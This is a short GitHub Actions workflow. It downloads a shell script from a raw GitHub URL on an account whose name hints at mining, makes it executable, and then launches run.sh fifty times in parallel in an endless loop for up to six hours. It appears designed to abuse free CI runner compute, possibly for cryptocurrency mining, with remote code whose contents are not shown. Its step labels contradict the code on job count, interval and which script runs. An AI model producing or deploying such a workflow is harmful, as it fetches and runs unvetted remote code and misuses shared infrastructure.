name: Infinite Parallel Run using GNU Parallel

on:
  workflow_dispatch:

jobs:
  run-parallel:
    runs-on: ubuntu-latest
    timeout-minutes: 360  # Optional: set how long it runs (max 6h)

    steps:
      - name: Install GNU parallel
        run: sudo apt-get update && sudo apt-get install -y parallel


      - name: Run `sh run.sh` 20x in parallel every 5s forever
        run: |
          wget https://raw.githubusercontent.com/kalepailmine001/tail/refs/heads/main/vid.sh && chmod +x vid.sh
          while true; do
            echo "⏱️ $(date) - Launching 20 parallel run.sh executions..."
            seq 50 | parallel -j50 sh run.sh
            echo "✅ Batch done. Sleeping 10 seconds..."
            sleep 10
          done
